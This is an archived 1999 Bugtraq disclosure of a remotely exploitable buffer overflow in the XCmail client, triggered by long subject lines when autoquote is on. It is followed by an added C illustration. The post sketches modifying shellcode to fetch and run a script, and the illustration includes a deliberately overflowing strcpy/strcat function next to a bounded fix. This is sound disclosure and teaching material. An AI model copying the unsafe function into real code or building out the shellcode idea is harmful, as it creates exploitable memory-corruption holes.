Bugtraq mailing list archives

[0z0n3] XCmail remotely exploitable vulnerability


From: pierric () ADMIN LINUX ORG (Arthur)
Date: Tue, 2 Mar 1999 00:41:21 +0100




-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have found a vulnerability in xcmail that is exploitable,
a simple buffer overflow vulnerability.

The bug appears when replying to a message with a long subject line, and
only when autoquote is on (dunno why... I didn't have time to read the
sources, and I'm so lazy)...

The exploit is trivial, but as the buffer is not very large you have to do
very precise return address calculation, and I believe it IS remotely
exploitable, but you have to know a lot about the machine you want to gain
access to... so this definitely won't be useful to script kiddies
(rootshell.com folks: don't waste your time ;)

Maybe one could upload a script by ftp, and modify the shellcode so that
it copies the file to /tmp, chmod()s it and executes it...

Sample exploit attached.

THE AUTHORS HAVE BEEN NOTIFIED, and they responded quickly.

- --
[ WWW  page ]  http://www.multimania.com/xsfx/
[ PGP  key  ]  http://www.multimania.com/xsfx/files/XSFX.key
      -
[ IRC       ]  EFnet / IRCnet
[ ICQ #     ]  26995402

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBNtslrnzELLdog5QhEQJbXgCffU7u/2JaO8nVtn7gCwphp5Ta3w4An3Cn
2IryEigG2+De4zaiVF6XWsN+
=lKAd
-----END PGP SIGNATURE-----

[Attachment: xcmail_exp.c]
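As an added illustration of the class of bug reported above (this is not XCmail's code, which is not on the page; the buffer size `SUBJECT_MAX`, the function names and the test inputs are assumed for the illustration), the following shows a reply subject being assembled into a fixed-size buffer with unbounded string functions, next to a bounded version that truncates and reports the truncation instead of writing past the buffer:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the reply-subject buffer, assumed for this example. */
#define SUBJECT_MAX 64

/* The unsafe pattern: the reply subject is built into a fixed buffer with
 * strcpy/strcat, so a Subject: header longer than the buffer (whose length
 * the sender controls) writes past its end. Shown for contrast only; it is
 * never called in this example. */
void build_reply_subject_unsafe(char *out, const char *subject)
{
    strcpy(out, "Re: ");
    strcat(out, subject);   /* no length check: overflow on a long subject */
}

/* The bounded replacement: snprintf never writes more than out_len bytes and
 * always NUL-terminates when out_len > 0. Returns 0 if the whole subject fit,
 * 1 if it had to be truncated, -1 on invalid arguments. */
int build_reply_subject(char *out, size_t out_len, const char *subject)
{
    if (out == NULL || subject == NULL || out_len == 0)
        return -1;
    int needed = snprintf(out, out_len, "Re: %s", subject);
    if (needed < 0)
        return -1;
    return ((size_t)needed >= out_len) ? 1 : 0;
}

/* Constructs a subject of subject_len 'A' characters (capped so it fits the
 * caller's buffer) to stand in for an incoming header of arbitrary length. */
static void make_subject(char *subject, size_t cap, size_t subject_len)
{
    if (subject_len > cap - 1)
        subject_len = cap - 1;
    memset(subject, 'A', subject_len);
    subject[subject_len] = '\0';
}

/* Runs the safe builder on a constructed subject of the given length and
 * returns its status (0 = fit, 1 = truncated). */
int truncated_for_length(size_t subject_len)
{
    char subject[512];
    char out[SUBJECT_MAX];
    make_subject(subject, sizeof(subject), subject_len);
    return build_reply_subject(out, sizeof(out), subject);
}

/* Length of the reply subject actually produced for a constructed subject of
 * the given length; it can never exceed SUBJECT_MAX - 1. */
size_t produced_length_for(size_t subject_len)
{
    char subject[512];
    char out[SUBJECT_MAX];
    make_subject(subject, sizeof(subject), subject_len);
    build_reply_subject(out, sizeof(out), subject);
    return strlen(out);
}

int main(void)
{
    /* Constructed inputs: a 5-character subject and a 200-character one. */
    printf("short subject truncated? %d (length kept: %zu)\n",
           truncated_for_length(5), produced_length_for(5));
    printf("long subject truncated?  %d (length kept: %zu)\n",
           truncated_for_length(200), produced_length_for(200));
    return 0;
}
```

The boundary worth checking is the exact fit: "Re: " plus a 59-character subject plus the terminating NUL is 64 bytes and still fits, while 60 characters is the first length that is truncated. A fixed-size buffer should be left in place only together with a check like the return value above; a caller that ignores it will silently lose part of the subject, which is a usability problem rather than a memory-safety one.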


